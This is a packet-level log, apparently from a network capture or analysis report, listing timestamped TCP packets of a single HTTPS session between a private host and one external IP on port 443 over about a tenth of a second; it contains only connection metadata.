Dec 21, 2024 21:04:48.980209112 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.980221987 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.980257034 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.980263948 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.980590105 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.980704069 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.980710030 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.981242895 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.981242895 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.981256962 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.981457949 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.981457949 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.981468916 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.981646061 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.981820107 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.981828928 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.982300997 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.982300997 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.982311010 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.982494116 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.982494116 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.982503891 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.982685089 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.982733011 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.982925892 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.983453035 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.983453035 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.983625889 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.985101938 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.985172033 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.985265970 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.985645056 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.985652924 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.985956907 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.986118078 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.986131907 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.986309052 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.986407042 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.986489058 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.986499071 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.987054110 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.988301039 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.988313913 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.988641977 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.988833904 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.988842964 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.989074945 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.991556883 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.991669893 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.991940022 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.991940022 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.991955042 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.992013931 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.992135048 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.992324114 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.992324114 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.992331028 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.992552996 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.994102955 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.994118929 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.995210886 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.995212078 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.995212078 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.995225906 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.996800900 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.996814966 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.996958017 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.996969938 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.997153044 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.997153044 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.998260975 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.998275995 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.998600006 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.998600006 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.998614073 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.999294043 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.999310017 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.999567986 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.999579906 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.999761105 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.000775099 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.000788927 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.000936031 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.000945091 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.001131058 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.001324892 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.002444029 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.002460957 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.002787113 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.002798080 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.003170013 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.005752087 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.005861998 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.005949974 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.006112099 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.006129980 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.006140947 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.006371021 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.007312059 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.007329941 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.007520914 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.007531881 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.007622957 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.007808924 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.007975101 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.008188009 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.008503914 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.008713007 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.008753061 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.008984089 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.008984089 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.008992910 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.009176970 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.019171000 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.019241095 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.019339085 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.019519091 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.019525051 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.019613981 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.019715071 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.019726992 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.019759893 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.019768000 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.020052910 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.021018982 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.021203995 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.021297932 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.021310091 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.021442890 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.021672010 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.021672010 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.021682024 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.022661924 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.022677898 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.022861958 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.023230076 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.023242950 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.026073933 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.026089907 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.026453972 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.026453972 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.026453972 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.026468992 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.031322002 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.031341076 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.031480074 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.031490088 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.031676054 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.032823086 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.032838106 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.033164024 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.033164024 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.033178091 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.033550024 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.038068056 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.038085938 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.038337946 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.038352013 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.038522005 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.038522005 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.039602995 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.039619923 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.039787054 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.039922953 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.039932013 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.040106058 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.045092106 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.045109034 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.045280933 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.045363903 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.045375109 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.045545101 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.045545101 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.045577049 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.045591116 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.045737028 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.045875072 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.045886040 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.046052933 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.052196980 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.052212000 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.052381992 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.052546978 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.052557945 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.052728891 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.053122997 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.053138018 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.053397894 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.053409100 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.053580046 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.053767920 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.055125952 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.055140972 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.055504084 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.055516005 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.055604935 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.055706024 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.055888891 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.055888891 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.055901051 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.055939913 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.056216002 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.064291000 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.064305067 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.064853907 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.064853907 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.064870119 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.065202951 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.065217972 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.065237045 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.065248966 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.065617085 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.065833092 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.066447973 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.066472054 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.066812038 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.066823959 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.066982985 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.067176104 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.068669081 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.068681955 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.068819046 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.068898916 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.068907976 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.069082975 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.069134951 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.082834005 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.082849026 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.083213091 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.083225965 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.083409071 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.083647966 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.086730003 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.086744070 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.087105989 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.087119102 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.087297916 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.090713978 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.090727091 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.090903997 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.090991020 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.090996981 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.091176033 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.091222048 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.092263937 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.092276096 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.092560053 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.092570066 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.092927933 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.093754053 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.093765974 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.093950987 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.094131947 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.094131947 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.094141960 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.094326973 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.095241070 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.095253944 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.095695019 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.095695019 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.095707893 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.096080065 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.096740007 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.096755981 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.096997976 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.097184896 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.097193956 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.097450018 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.098442078 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.098462105 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.098788023 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.098788023 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.098802090 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.099170923 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.099206924 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.099220037 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.099407911 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.099589109 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.099589109 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.099601030 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.099781036 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.100733995 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.100747108 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.100930929 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.101013899 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.101013899 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.101025105 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.101192951 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.105128050 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.105143070 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.105464935 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.105464935 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.105478048 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.106128931 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.106141090 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.106492043 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.106492043 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.106503010 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.106682062 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.107899904 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.107913971 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.108061075 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.108072042 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.108256102 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.109101057 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.109112978 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.109261036 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.109471083 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.109477997 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.109832048 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.109847069 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.110017061 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.110027075 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.110295057 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.110661983 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.110673904 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.110820055 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.110832930 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.111011982 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.111205101 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.111641884 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.111654997 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.111984015 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.111984015 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.111999989 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.113334894 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.113349915 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.113523006 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.113533974 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.113796949 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.114645958 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.114658117 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.114995003 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.114995003 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.115008116 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.115839005 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.115853071 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.116193056 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.116204023 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.116575003 CET	49755	443	192.168.11.20	104.21.37.173
